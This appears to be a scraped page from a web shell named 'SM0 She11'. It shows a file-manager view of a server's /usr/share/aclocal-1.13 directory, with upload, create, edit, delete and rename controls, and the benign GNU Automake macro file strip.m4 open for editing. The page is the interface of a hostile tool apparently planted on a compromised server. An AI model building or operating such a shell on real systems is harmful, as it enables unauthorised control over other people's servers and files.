SM0 She11
Path:
/
/
usr
/
share
/
aclocal-1.13
Full Path (server): /usr/share/aclocal-1.13
Create Fil3
Upl04d Fil3
📄 amversion.m4
[E]
[D]
[R]
📄 ar-lib.m4
[E]
[D]
[R]
📄 as.m4
[E]
[D]
[R]
📄 auxdir.m4
[E]
[D]
[R]
📄 cond-if.m4
[E]
[D]
[R]
📄 cond.m4
[E]
[D]
[R]
📄 depend.m4
[E]
[D]
[R]
📄 depout.m4
[E]
[D]
[R]
📄 dmalloc.m4
[E]
[D]
[R]
📄 extra-recurs.m4
[E]
[D]
[R]
📄 gcj.m4
[E]
[D]
[R]
📄 init.m4
[E]
[D]
[R]
📄 install-sh.m4
[E]
[D]
[R]
📁 internal
Open
[D]
[R]
📄 lead-dot.m4
[E]
[D]
[R]
📄 lex.m4
[E]
[D]
[R]
📄 lispdir.m4
[E]
[D]
[R]
📄 maintainer.m4
[E]
[D]
[R]
📄 make.m4
[E]
[D]
[R]
📄 minuso.m4
[E]
[D]
[R]
📄 missing.m4
[E]
[D]
[R]
📄 mkdirp.m4
[E]
[D]
[R]
📄 obsolete.m4
[E]
[D]
[R]
📄 options.m4
[E]
[D]
[R]
📄 python.m4
[E]
[D]
[R]
📄 runlog.m4
[E]
[D]
[R]
📄 sanity.m4
[E]
[D]
[R]
📄 silent.m4
[E]
[D]
[R]
📄 strip.m4
[E]
[D]
[R]
📄 substnot.m4
[E]
[D]
[R]
📄 tar.m4
[E]
[D]
[R]
📄 upc.m4
[E]
[D]
[R]
📄 vala.m4
[E]
[D]
[R]
Editing: strip.m4
## -*- Autoconf -*- # Copyright (C) 2001-2013 Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # AM_PROG_INSTALL_STRIP # --------------------- # One issue with vendor 'install' (even GNU) is that you can't # specify the program used to strip binaries. This is especially # annoying in cross-compiling environments, where the build's strip # is unlikely to handle the host's binaries. # Fortunately install-sh will honor a STRIPPROG variable, so we # always use install-sh in "make install-strip", and initialize # STRIPPROG with the value of the STRIP variable (set by the user). AC_DEFUN([AM_PROG_INSTALL_STRIP], [AC_REQUIRE([AM_PROG_INSTALL_SH])dnl # Installed binaries are usually stripped using 'strip' when the user # run "make install-strip". However 'strip' might not be the right # tool to use in cross-compilation environments, therefore Automake # will honor the 'STRIP' environment variable to overrule this program. dnl Don't test for $cross_compiling = yes, because it might be 'maybe'. if test "$cross_compiling" != no; then AC_CHECK_TOOL([STRIP], [strip], :) fi INSTALL_STRIP_PROGRAM="\$(install_sh) -c -s" AC_SUBST([INSTALL_STRIP_PROGRAM])])
Save